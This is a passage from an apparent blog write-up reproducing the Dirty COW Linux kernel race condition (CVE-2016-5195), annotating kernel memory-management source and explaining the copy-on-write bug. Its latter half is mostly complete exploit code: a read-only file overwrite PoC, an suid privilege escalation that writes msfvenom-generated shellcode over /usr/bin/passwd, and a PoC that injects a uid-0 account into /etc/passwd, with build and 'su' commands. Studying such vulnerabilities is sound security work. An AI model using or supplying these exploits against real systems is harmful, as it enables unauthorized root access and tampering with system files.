flush_cache_page(vma, fe->address, pte_pfn(orig_pte));
entry = pte_mkyoung(orig_pte); //标记下刚刚访问过
entry = maybe_mkwrite(pte_mkdirty(entry), vma); //设置脏位,如果VMA可写的话设置写入位
if (ptep_set_access_flags(vma, fe->address, fe->pte, entry, 1)) //写入PTE
update_mmu_cache(vma, fe->address, fe->pte); //更新mmu缓存
pte_unmap_unlock(fe->pte, fe->ptl);

if (dirty_shared) {
struct address_space *mapping;
int dirtied;

if (!page_mkwrite)
lock_page(page);

dirtied = set_page_dirty(page);
VM_BUG_ON_PAGE(PageAnon(page), page);
mapping = page->mapping;
unlock_page(page);
put_page(page);

if ((dirtied || page_mkwrite) && mapping) {
/*
* Some device drivers do not set page.mapping
* but still dirty their pages
*/
balance_dirty_pages_ratelimited(mapping);
}

if (!page_mkwrite)
file_update_time(vma->vm_file);
}
return VM_FAULT_WRITE; //this flag means that, after the COW, the page can now be written
}

Finally, when handle_mm_fault() returns into faultin_page(), the VM_FAULT_WRITE flag signals that the page may be written, so FOLL_WRITE is stripped from flags and write permission is no longer checked:

if ((ret & VM_FAULT_WRITE) && !(vma->vm_flags & VM_WRITE))
*flags &= ~FOLL_WRITE;
return 0;

The call chain is as follows:

faultin_page()
handle_mm_fault()
__handle_mm_fault()
handle_pte_fault()
do_fault()
do_wp_page()
wp_page_reuse()
maybe_mkwrite(pte_mkdirty(entry), vma);
return VM_FAULT_WRITE;

The third pass of __get_user_pages()

On the third entry into follow_page_mask(), since FOLL_WRITE was removed earlier, the PTE's write permission is no longer checked, so follow_page_mask() returns the page:

if ((flags & FOLL_WRITE) && !pte_write(pte)) { // a write was requested, but the PTE says not writable
pte_unmap_unlock(ptep, ptl);
return NULL;
}

  • Execution then returns along the path get_user_pages() -> __get_user_pages_locked() -> get_user_pages_remote() -> __access_remote_vm().
  • Once __access_remote_vm() has pinned the page, it first calls kmap() to map the page into kernel address space, then calls copy_to_user_page() to copy the data from the kernel buffer into that page.
//page is the one get_user_pages_remote() found for the user; it is pinned in memory, and kmap() maps it into kernel address space
maddr = kmap(page);
if (write) { //a write request
/*
copy_to_user_page() does the actual write:
maddr is the pinned page for addr, offset is addr's offset within that page, so maddr + offset is the destination address;
equivalent to: memcpy(maddr + offset, buf, bytes)
*/
copy_to_user_page(vma, page, addr,
maddr + offset, buf, bytes);

How to use madvise

The madvise() system call gives the kernel advice or hints about how the memory region starting at addr with length length will be used. In most cases the goal of such advice is to improve system or application performance.
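
For reference, the userspace prototype (the standard libc wrapper declared in <sys/mman.h>) looks like this; the exploit only cares about the MADV_DONTNEED advice:

#include <sys/mman.h>

/* Advise the kernel about how the range [addr, addr + length) will be used.
 * Returns 0 on success, -1 on error with errno set. */
int madvise(void *addr, size_t length, int advice);

/* e.g. discard the pages backing mem — for a private file mapping this
 * throws away the process's COW copy:
 *     madvise(mem, 0x1000, MADV_DONTNEED);
 */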

Test demo

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/mman.h>
#include <sys/stat.h>

int fd;
struct stat st;
void *mem;

void processMem(void)
{
    /* writing through /proc/self/mem forces the kernel down the COW path,
       even though the mapping itself is read-only */
    int f = open("/proc/self/mem", O_RDWR);
    lseek(f, (off_t)mem, SEEK_SET);
    write(f, "AAA", 3);
    printf("%s\n", (char *)mem);

    /* advise the kernel to drop the private COW copy */
    madvise(mem, 0x100, MADV_DONTNEED);
}

int main(void)
{
    fd = open("/flag", O_RDONLY);
    fstat(fd, &st);
    /* read-only, private mapping of the target file */
    mem = mmap(NULL, st.st_size, PROT_READ, MAP_PRIVATE, fd, 0);

    processMem();
    return 0;
}

sys_madvise()

/*
* The madvise(2) system call.
*
* Applications can use madvise() to advise the kernel how it should
* handle paging I/O in this VM area. The idea is to help the kernel
* use appropriate read-ahead and caching techniques. The information
* provided is advisory only, and can be safely disregarded by the
* kernel without affecting the correct operation of the application.
*
* behavior values:
* MADV_NORMAL - the default behavior is to read clusters. This
* results in some read-ahead and read-behind.
* MADV_RANDOM - the system should read the minimum amount of data
* on any access, since it is unlikely that the appli-
* cation will need more than what it asks for.
* MADV_SEQUENTIAL - pages in the given range will probably be accessed
* once, so they can be aggressively read ahead, and
* can be freed soon after they are accessed.
* MADV_WILLNEED - the application is notifying the system to read
* some pages ahead.
* MADV_DONTNEED - the application is finished with the given range,
* so the kernel can free resources associated with it.
* MADV_FREE - the application marks pages in the given range as lazy free,
* where actual purges are postponed until memory pressure happens.
* MADV_REMOVE - the application wants to free up the given range of
* pages and associated backing store.
* MADV_DONTFORK - omit this area from child's address space when forking:
* typically, to avoid COWing pages pinned by get_user_pages().
* MADV_DOFORK - cancel MADV_DONTFORK: no longer omit this area when forking.
* MADV_HWPOISON - trigger memory error handler as if the given memory range
* were corrupted by unrecoverable hardware memory failure.
* MADV_SOFT_OFFLINE - try to soft-offline the given range of memory.
* MADV_MERGEABLE - the application recommends that KSM try to merge pages in
* this area with pages of identical content from other such areas.
* MADV_UNMERGEABLE- cancel MADV_MERGEABLE: no longer merge pages with others.
* MADV_HUGEPAGE - the application wants to back the given range by transparent
* huge pages in the future. Existing pages might be coalesced and
* new pages might be allocated as THP.
* MADV_NOHUGEPAGE - mark the given range as not worth being backed by
* transparent huge pages so the existing pages will not be
* coalesced into THP and new pages will not be allocated as THP.
* MADV_DONTDUMP - the application wants to prevent pages in the given range
* from being included in its core dump.
* MADV_DODUMP - cancel MADV_DONTDUMP: no longer exclude from core dump.
*
* return values:
* zero - success
* -EINVAL - start + len < 0, start is not page-aligned,
* "behavior" is not a valid value, or application
* is attempting to release locked or shared pages.
* -ENOMEM - addresses in the specified range are not currently
* mapped, or are outside the AS of the process.
* -EIO - an I/O error occurred while paging in data.
* -EBADF - map exists, but area maps something that isn't a file.
* -EAGAIN - a kernel resource was temporarily unavailable.
*/
/*
A process can use madvise() to advise the kernel on how to handle the given memory region.
@start: start address of the region
@len_in: length
@behavior: the advice
*/
SYSCALL_DEFINE3(madvise, unsigned long, start, size_t, len_in, int, behavior)
{
unsigned long end, tmp;
struct vm_area_struct *vma, *prev;
int unmapped_error = 0;
int error = -EINVAL;
int write;
size_t len;
struct blk_plug plug;

#ifdef CONFIG_MEMORY_FAILURE
if (behavior == MADV_HWPOISON || behavior == MADV_SOFT_OFFLINE)
return madvise_hwpoison(behavior, start, start+len_in);
#endif
//check that behavior is a valid value
if (!madvise_behavior_valid(behavior))
return error;
//the start address must be page-aligned
if (start & ~PAGE_MASK)
return error;
//round len up to a whole number of pages
len = (len_in + ~PAGE_MASK) & PAGE_MASK;

/* Check to see whether len was rounded up from small -ve to zero */
//len overflowed
if (len_in && !len)
return error;
//end address
end = start + len;
if (end < start)
return error;

error = 0;
if (end == start)
return error;
//check whether this behavior needs write access to the mmap, and take the corresponding semaphore
write = madvise_need_mmap_write(behavior);
if (write) {
if (down_write_killable(&current->mm->mmap_sem))
return -EINTR;
} else {
down_read(&current->mm->mmap_sem);
}

/*
* If the interval [start,end) covers some unmapped address
* ranges, just ignore them, but return -ENOMEM at the end.
* - different from the way of handling in mlock etc.
*/
//find the VMA that contains start
vma = find_vma_prev(current->mm, start, &prev);
if (vma && start > vma->vm_start)
prev = vma;

blk_start_plug(&plug);
for (;;) {//iterate over all affected VMAs
/* Still start < end. */
error = -ENOMEM;
if (!vma)
goto out;

/* Here start < (end|vma->vm_end). */
if (start < vma->vm_start) {
unmapped_error = -ENOMEM;
start = vma->vm_start;
if (start >= end) //no VMA covers start
goto out;
}

/*tmp is the end address of this round of advice. Here vma->vm_start <= start < (end|vma->vm_end) */

tmp = vma->vm_end;
if (end < tmp)
tmp = end;

/*apply the advice. Here vma->vm_start <= start < tmp <= (end|vma->vm_end). */
error = madvise_vma(vma, &prev, start, tmp, behavior);
if (error)
goto out;
start = tmp; //start address for the next iteration
if (prev && start < prev->vm_end)
start = prev->vm_end;
error = unmapped_error;
if (start >= end) //done
goto out;
//look up the next VMA
if (prev)
vma = prev->vm_next;
else /* madvise_remove dropped mmap_sem */
vma = find_vma(current->mm, start);
}
out:
blk_finish_plug(&plug);
if (write)
up_write(&current->mm->mmap_sem);
else
up_read(&current->mm->mmap_sem);

return error;
}

madvise_vma()

madvise_vma() dispatches the request to the handler matching behavior; for MADV_DONTNEED it calls madvise_dontneed():

static long
madvise_vma(struct vm_area_struct *vma, struct vm_area_struct **prev,
unsigned long start, unsigned long end, int behavior)
{
switch (behavior) {
case MADV_REMOVE:
return madvise_remove(vma, prev, start, end);
case MADV_WILLNEED:
return madvise_willneed(vma, prev, start, end);
case MADV_FREE:
/*
* XXX: In this implementation, MADV_FREE works like
* MADV_DONTNEED on swapless system or full swap.
*/
if (get_nr_swap_pages() > 0)
return madvise_free(vma, prev, start, end);
/* passthrough */
case MADV_DONTNEED:
return madvise_dontneed(vma, prev, start, end);
default:
return madvise_behavior(vma, prev, start, end, behavior);
}
}

madvise_dontneed()

/*
* Application no longer needs these pages. If the pages are dirty,
* it's OK to just throw them away. The app will be more careful about
* data it wants to keep. Be sure to free swap resources too. The
* zap_page_range call sets things up for shrink_active_list to actually free
* these pages later if no one else has touched them in the meantime,
* although we could add these pages to a global reuse list for
* shrink_active_list to pick up before reclaiming other pages.
*
* NB: This interface discards data rather than pushes it out to swap,
* as some implementations do. This has performance implications for
* applications like large transactional databases which want to discard
* pages in anonymous maps after committing to backing store the data
* that was kept in them. There is no reason to write this data out to
* the swap area if the application is discarding it.
*
* An interface that causes the system to free clean pages and flush
* dirty pages is already available as msync(MS_INVALIDATE).
*/
/*
The application says it no longer needs these pages; even dirty pages are simply thrown away, so the application must save any data it cares about before discarding them.
zap_page_range() sets things up so that shrink_active_list can actually free these pages later, if nobody touches them in the meantime. */
static long madvise_dontneed(struct vm_area_struct *vma,
struct vm_area_struct **prev,
unsigned long start, unsigned long end)
{
*prev = vma;
//these kinds of pages cannot be dropped
if (vma->vm_flags & (VM_LOCKED|VM_HUGETLB|VM_PFNMAP))
return -EINVAL;

zap_page_range(vma, start, end - start, NULL);
return 0;
}

zap_page_range()

zap_page_range() walks every VMA in the given range and calls unmap_single_vma(...) on each one.

/**
* zap_page_range - remove user pages in a given range
* @vma: vm_area_struct holding the applicable pages
* @start: starting address of pages to zap
* @size: number of bytes to zap
* @details: details of shared cache invalidation
*
* Caller must protect the VMA list
*/
void zap_page_range(struct vm_area_struct *vma, unsigned long start,
unsigned long size, struct zap_details *details)
{
struct mm_struct *mm = vma->vm_mm;
struct mmu_gather tlb;
unsigned long end = start + size;

lru_add_drain();
tlb_gather_mmu(&tlb, mm, start, end);
update_hiwater_rss(mm);
mmu_notifier_invalidate_range_start(mm, start, end);
//walk every VMA from vma until end
for ( ; vma && vma->vm_start < end; vma = vma->vm_next)
unmap_single_vma(&tlb, vma, start, end, details);
mmu_notifier_invalidate_range_end(mm, start, end);
tlb_finish_mmu(&tlb, start, end);
}

From there it walks down the page-table levels along the path unmap_single_vma() => unmap_page_range() => zap_pud_range() => zap_pmd_range() => zap_pte_range(), and finally zap_pte_range() iterates over every PTE.

zap_pte_range()

zap_pte_range() releases every page in the range.

It walks each page in the range, clears its PTE in the page table, and drops the page's reference count; once the refcount reaches 0 the page is reclaimed by the kernel.

//release the pages mapped by the PTEs
static unsigned long zap_pte_range(struct mmu_gather *tlb,
struct vm_area_struct *vma, pmd_t *pmd,
unsigned long addr, unsigned long end,
struct zap_details *details)
{
struct mm_struct *mm = tlb->mm;
int force_flush = 0;
int rss[NR_MM_COUNTERS];
spinlock_t *ptl;
pte_t *start_pte;
pte_t *pte;
swp_entry_t entry;
struct page *pending_page = NULL;

again:
init_rss_vec(rss);
start_pte = pte_offset_map_lock(mm, pmd, addr, &ptl);
pte = start_pte;
arch_enter_lazy_mmu_mode();
//walk every page in [addr, end)
do {
pte_t ptent = *pte;
if (pte_none(ptent)) { //nothing to do if the PTE is none
continue;
}

if (pte_present(ptent)) {// the page is present
struct page *page;

page = vm_normal_page(vma, addr, ptent); //find the page descriptor for addr
if (unlikely(details) && page) {
/*
* unmap_shared_mapping_pages() wants to
* invalidate cache without truncating:
* unmap shared but keep private pages.
*/
if (details->check_mapping &&
details->check_mapping != page_rmapping(page))
continue;
}
ptent = ptep_get_and_clear_full(mm, addr, pte,
tlb->fullmm); //fetch the old PTE and clear the entry in the page table
tlb_remove_tlb_entry(tlb, pte, addr);//remove the matching TLB entry
if (unlikely(!page))
continue;

if (!PageAnon(page)) { //file-backed page: no writeback is done here, but the address_space callbacks still need to run
if (pte_dirty(ptent)) { //if the page is dirty
/*
* oom_reaper cannot tear down dirty
* pages
*/
if (unlikely(details && details->ignore_dirty))
continue;
force_flush = 1;
set_page_dirty(page); //invokes the file's address-space method: mapping->a_ops->set_page_dirty()
}
if (pte_young(ptent) &&
likely(!(vma->vm_flags & VM_SEQ_READ)))
mark_page_accessed(page); //note that the page was just accessed
}
//remove the reverse mapping and drop the page's reference count
rss[mm_counter(page)]--;
page_remove_rmap(page, false);
if (unlikely(page_mapcount(page) < 0))
print_bad_pte(vma, addr, ptent, page);
if (unlikely(__tlb_remove_page(tlb, page))) { //remove the page from the TLB batch
force_flush = 1;
pending_page = page;
addr += PAGE_SIZE;
break;
}
continue; //move on to the next page
}
/* only check swap_entries if explicitly asked for in details */
if (unlikely(details && !details->check_swap_entries))
continue;

entry = pte_to_swp_entry(ptent);
if (!non_swap_entry(entry))
rss[MM_SWAPENTS]--;
else if (is_migration_entry(entry)) {
struct page *page;

page = migration_entry_to_page(entry);
rss[mm_counter(page)]--;
}
if (unlikely(!free_swap_and_cache(entry)))
print_bad_pte(vma, addr, ptent, NULL);
pte_clear_not_present_full(mm, addr, pte, tlb->fullmm);
} while (pte++, addr += PAGE_SIZE, addr != end);

add_mm_rss_vec(mm, rss);
arch_leave_lazy_mmu_mode();

/* Do the actual TLB flush before dropping ptl */
if (force_flush)
tlb_flush_mmu_tlbonly(tlb);
pte_unmap_unlock(start_pte, ptl);

/*
* If we forced a TLB flush (either due to running out of
* batch buffers or because we needed to flush dirty TLB
* entries before releasing the ptl), free the batched
* memory too. Restart if we didn't do everything.
*/
if (force_flush) {
force_flush = 0;
tlb_flush_mmu_free(tlb);
if (pending_page) {
/* remove the page with new size */
__tlb_remove_pte_page(tlb, pending_page);
pending_page = NULL;
}
if (addr != end)
goto again;
}

return addr;
}

0x03: Vulnerability Analysis

Holy cow, we finally made it here.

Let's recap the whole flow.

  • Step Ⅰ: in the first __get_user_pages() loop, faultin_page() sees a write into a read-only region, so it calls do_cow_fault(). do_cow_fault() copies the original file-cache page into a new page and installs a PTE pointing to it; but since the VMA is not writable, this new page's PTE does not get the RW bit.
  • Step Ⅱ: in the second __get_user_pages() loop, foll_flags still carries FOLL_WRITE but the page's PTE has no RW bit, so follow_page_mask() decides the permissions are wrong and we enter faultin_page() again. faultin_page() determines this is a write to an already-present read-only page, so it calls do_wp_page(). do_wp_page() finds the page is an anonymous page with a single reference, so it calls wp_page_reuse() to reuse it directly. Because the VMA is read-only, wp_page_reuse() only sets the Dirty bit on the PTE, not the RW bit, and returns VM_FAULT_WRITE to indicate that the kernel may write to this page. Back in faultin_page(), since handle_mm_fault() returned VM_FAULT_WRITE, the FOLL_WRITE flag is dropped; the meaning is: although the PTE is not writable, the page has already been COWed and the kernel may write to it, so later calls to follow_page_mask() need not check write permission anymore.

Now, what happens if at this point we call madvise() with the MADV_DONTNEED behavior and the kernel clears this PTE? 🤔

First, follow_page_mask() fails once more because the PTE is now empty, so we enter faultin_page() again — but note that this time there is no FOLL_WRITE flag. faultin_page() therefore sets fault_flags without FAULT_FLAG_WRITE; in other words, faultin_page() promises handle_mm_fault() that it will not write to the page. Since the PTE is none and no write is requested, handle_mm_fault() ultimately dispatches to do_read_fault().

do_read_fault()

do_read_fault() looks up the original cache page for address in the address space that this VMA maps, and returns that original cache page.

static int do_read_fault(struct fault_env *fe, pgoff_t pgoff)
{
struct vm_area_struct *vma = fe->vma;
struct page *fault_page;
int ret = 0;

/*
* Let's call ->map_pages() first and use ->fault() as fallback
* if page by the offset is not ready to be mapped (cold cache or
* something).
*/
if (vma->vm_ops->map_pages && fault_around_bytes >> PAGE_SHIFT > 1) {
ret = do_fault_around(fe, pgoff);
if (ret)
return ret;
}

ret = __do_fault(fe, pgoff, NULL, &fault_page, NULL);
if (unlikely(ret & (VM_FAULT_ERROR | VM_FAULT_NOPAGE | VM_FAULT_RETRY)))
return ret;

ret |= alloc_set_pte(fe, NULL, fault_page);
if (fe->pte)
pte_unmap_unlock(fe->pte, fe->ptl);
unlock_page(fault_page);
if (unlikely(ret & (VM_FAULT_ERROR | VM_FAULT_NOPAGE | VM_FAULT_RETRY)))
put_page(fault_page);
return ret;
}

Although what ran this time is do_read_fault(), the write flag is still true, so __access_remote_vm() calls copy_to_user_page() and writes the user-supplied data into the pinned page — thereby dirtying the file's original page-cache page.

Some time later, when the disk is synced, the kernel writes the dirtied page back to disk, modifying the contents of the read-only file.

And with that, the exploit is complete.

The key problem: the race window

It's not hard to see that with two threads we can get the madvise() in after the second __get_user_pages() pass and before the third.

But the size of the time window matters a lot — it determines the exploit's success rate and its practical value.

Fortunately, at the start of every loop iteration the kernel calls cond_resched() and may switch to another task, so the gap is more than enough.

if (unlikely(fatal_signal_pending(current)))
return i ? i : -ERESTARTSYS;
cond_resched();//give the scheduler a chance to run other tasks

0x04: Exploitation & Writing the exp

Let's start with a proof-of-concept.

#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <sys/mman.h>
#include <fcntl.h>
#include <pthread.h>
#include <unistd.h>
#include <sys/stat.h>
#include <string.h>
#include <stdint.h>
#include <sys/sem.h>
#include <semaphore.h>

struct stat dest_st, fake_st;
void *mem;
int mem_fd, dest_fd, fake_fd;
char *fake_data;
pthread_t mem_pthread, madvise_pthread;

void err_exit(char *msg)
{
printf("\033[31m\033[1m[x] Error at: \033[0m%s\n", msg);
sleep(5);
exit(EXIT_FAILURE);
}

void * mem_func()
{
mem_fd = open("/proc/self/mem", O_RDWR);
for (int i = 0; i < 0x100000; i++)
{
lseek(mem_fd, (off_t) mem, SEEK_SET);
write(mem_fd, fake_data, fake_st.st_size); // write only as many bytes as the fake file actually holds
}
return NULL;
}

void * madvise_func()
{
for (int i = 0; i< 0x100000; i++)
{
madvise(mem, 0x100, MADV_DONTNEED);
}
return NULL;
}

int main(int argc, char ** argv)
{
if (argc != 3)
err_exit("usage: ./exp <destination_file> <fake_file>");

//open & read fake file
fake_fd = open(argv[2], O_RDONLY);
fstat(fake_fd, &fake_st);
printf("fake_fd is %d\n", fake_fd);
fake_data = malloc(fake_st.st_size);
read(fake_fd, fake_data, fake_st.st_size);

//open dest file
dest_fd = open(argv[1], O_RDONLY);
printf("dest_fd is %d\n", dest_fd);
fstat(dest_fd, &dest_st);
mem = mmap(NULL, dest_st.st_size, PROT_READ, MAP_PRIVATE, dest_fd, 0);

pthread_create(&mem_pthread, NULL, mem_func, NULL);
pthread_create(&madvise_pthread, NULL, madvise_func, NULL);

pthread_join(mem_pthread, NULL);
pthread_join(madvise_pthread, NULL);


return 0;
}


As you can see, a file that an ordinary user can only read can now be overwritten.
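
To try it out, something like the following works (a minimal sketch — the file names and the poc.c name are just assumptions; any root-owned file that your user can read but not write will do):

# as root, set up a read-only target in the test VM
echo "root only data" > /tmp/target && chmod 0644 /tmp/target

# as an unprivileged user
echo "overwritten by dirty cow" > /tmp/fake
gcc poc.c -o poc -lpthread
./poc /tmp/target /tmp/fake
cat /tmp/target   # should now show the fake data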

And now we can move on to some naughtier 🥵🥵🥵 business.

Privilege escalation via an suid binary

This trick is common enough in penetration testing that I won't belabor it here.

The idea is simply to use dirtycow to tamper with a file that has the suid bit set, write privilege-escalating shellcode into it, and then execute it.

poc

Generate the shellcode with msf

msfvenom -p linux/x64/exec PrependSetuid=True -f elf | xxd -i
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <sys/mman.h>
#include <fcntl.h>
#include <pthread.h>
#include <unistd.h>
#include <sys/stat.h>
#include <string.h>
#include <stdint.h>
#include <sys/sem.h>
#include <semaphore.h>

struct stat dest_st;
void *mem;
int data_len = 149;
pthread_t mem_pthread, madvise_pthread;
int dest_fd, fake_fd, mem_fd;

unsigned char attack_data[] = {
0x7f, 0x45, 0x4c, 0x46, 0x02, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x3e, 0x00, 0x01, 0x00, 0x00, 0x00,
0x78, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x38, 0x00, 0x01, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x07, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00,
0x95, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xb2, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x48, 0x31, 0xff, 0x6a, 0x69, 0x58, 0x0f, 0x05, 0x48, 0xb8, 0x2f, 0x62,
0x69, 0x6e, 0x2f, 0x73, 0x68, 0x00, 0x99, 0x50, 0x54, 0x5f, 0x52, 0x5e,
0x6a, 0x3b, 0x58, 0x0f, 0x05
};

void * mem_func(void * argv)
{
mem_fd = open("/proc/self/mem", O_RDWR);
printf("mem_fd is %d\n", mem_fd);
for (int i = 0; i < 0x100000; i++)
{
lseek(mem_fd, (off_t) mem, SEEK_SET);
write(mem_fd, attack_data, data_len);
}
return NULL;
}

void * madvise_func(void * argv)
{
for (int i = 0; i < 0x100000; i++)
{
madvise(mem, 0x100, MADV_DONTNEED);
}
return NULL;
}

int main(int argc, char ** argv)
{

dest_fd = open("/usr/bin/passwd", O_RDONLY);
printf("dest_fd is %d\n", dest_fd);
fstat(dest_fd, &dest_st);
mem = mmap(NULL, dest_st.st_size, PROT_READ, MAP_PRIVATE, dest_fd, 0);

pthread_create(&mem_pthread, NULL, mem_func, NULL);
pthread_create(&madvise_pthread, NULL, madvise_func, NULL);

pthread_join(madvise_pthread, NULL);
pthread_join(mem_pthread, NULL);



return 0;
}


Random notes:

First, I tried to use strlen() to get the length of the shellcode, but it simply never worked. In hindsight, the likely reason is that the payload is a complete ELF image containing NUL bytes, so strlen() stops at the first 0x00 and returns far less than the real 149 bytes (if any master has a better explanation, please do contact this silly author, much appreciated 😭😭😭).

Second, I grabbed the filesystem from some random kernel challenge and swapped in the target kernel to serve as the reproduction environment, only to find the sole suid binary was busybox — which you really cannot overwrite; doing so kernel-panics on the spot. I then dropped in a test program manually given the suid bit, but after overwriting it, running it just segfaults. In the end I had to install an Ubuntu 14.04.

Finally, even after escalating to root, the system tends to fall over a little while later.

Privilege escalation via /etc/passwd

Adding a user with root privileges to /etc/passwd is enough (the PoC below writes the new record over the beginning of the file).
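
For context, each /etc/passwd record has seven colon-separated fields — name, password hash, uid, gid, comment, home directory, shell. The record the PoC builds looks roughly like this (the hash field is whatever crypt() produces; shown here only as a placeholder), and uid/gid 0 is what makes the account root:

korey:<crypt-hash>:0:0:korey0sh1's shell:/root:/bin/bash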

poc

#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <sys/mman.h>
#include <fcntl.h>
#include <pthread.h>
#include <unistd.h>
#include <sys/stat.h>
#include <string.h>
#include <stdint.h>
#include <sys/sem.h>
#include <semaphore.h>
#include <crypt.h>

struct stat dest_st;
void *mem;
pthread_t mem_pthread, madvise_pthread;
int dest_fd, fake_fd, mem_fd;
int info_len;
char * info_data;

struct passwd_info
{
char * name;
char * password;
int uid;
int gid;
char * info;
char * home_dir;
char * shell;
};


void * mem_func(void * argv)
{
mem_fd = open("/proc/self/mem", O_RDWR);
printf("mem_fd is %d\n", mem_fd);
for (int i = 0; i < 0x100000; i++)
{
lseek(mem_fd, (off_t) mem, SEEK_SET);
write(mem_fd, info_data, info_len);
}
return NULL;
}

void * madvise_func(void * argv)
{
for (int i = 0; i < 0x100000; i++)
{
madvise(mem, 0x100, MADV_DONTNEED);
}
return NULL;
}


int main(int argc, char ** argv)
{
struct passwd_info korey_info;

korey_info.name = "korey";
korey_info.password = "password";
korey_info.uid = 0;
korey_info.gid = 0;
korey_info.info = "korey0sh1's shell";
korey_info.home_dir = "/root";
korey_info.shell = "/bin/bash";

info_len = snprintf(NULL, 0, "%s:%s:%d:%d:%s:%s:%s\n",
korey_info.name,
crypt(korey_info.password, korey_info.name),
korey_info.uid,
korey_info.gid,
korey_info.info,
korey_info.home_dir,
korey_info.shell
);

info_data = malloc(info_len + 10);

sprintf(info_data, "%s:%s:%d:%d:%s:%s:%s\n",
korey_info.name,
crypt(korey_info.password, korey_info.name),
korey_info.uid,
korey_info.gid,
korey_info.info,
korey_info.home_dir,
korey_info.shell
);

printf("info is ");
write(1, info_data, info_len);


dest_fd = open("/etc/passwd", O_RDONLY);
printf("dest_fd is %d\n", dest_fd);
fstat(dest_fd, &dest_st);
mem = mmap(NULL, dest_st.st_size, PROT_READ, MAP_PRIVATE, dest_fd, 0);

pthread_create(&mem_pthread, NULL, mem_func, NULL);
pthread_create(&madvise_pthread, NULL, madvise_func, NULL);

pthread_join(madvise_pthread, NULL);
pthread_join(mem_pthread, NULL);


return 0;
}


crypt() comes from a separate library, so you have to add -lcrypt by hand when compiling.
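
A minimal build-and-use sketch (assuming the source above is saved as exp.c; the username and password are the ones hard-coded in the PoC):

gcc exp.c -o exp -lpthread -lcrypt
./exp          # let the two threads race until the record lands in /etc/passwd
su korey       # password: password — uid/gid 0 gives a root shell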

This approach is a lot more comfortable.

0xff: Closing words

It took me about a week of stumbling along to finish reproducing this ancient CVE.

I had hoped that, for such an old bug, I could work it out and write the exp myself without reading other masters' analyses and PoCs 😭😭😭

That turned out to be a complete failure 🥵🥵🥵

Looking back at dirtycow from 8 years ago, I am deeply won over by Linux kernel exploitation and the old-school hacker aesthetic behind it.

Now I finally understand what master Xiaoqi meant: the evolution of kernel exploitation is charming enough by itself — picking up a single shell on the beach is already enough to make you happy :)

Hope I can keep at it :)


